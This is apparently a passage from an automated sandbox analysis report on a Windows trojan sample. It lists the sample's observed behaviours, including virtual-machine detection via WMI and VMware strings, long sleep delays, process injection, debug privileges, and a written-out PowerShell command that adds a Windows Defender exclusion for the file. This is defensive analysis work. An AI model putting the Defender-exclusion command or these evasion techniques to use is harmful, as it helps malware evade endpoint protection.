Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 6284Thread sleep time: -40999s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 6756Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 660Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 7080Thread sleep count: 1412 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe TID: 7080Thread sleep count: 8427 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4268Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4297Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWindow / User API: threadDelayed 1412Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWindow / User API: threadDelayed 8427Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 0_2_00235FE1 sldt word ptr [eax]0_2_00235FE1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 40999Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C10040 LdrInitializeThunk,7_2_00C10040
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe base: 400000 value starts with: 4D5A
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.936956122.00000000014D0000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.936956122.00000000014D0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.936956122.00000000014D0000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.936956122.00000000014D0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
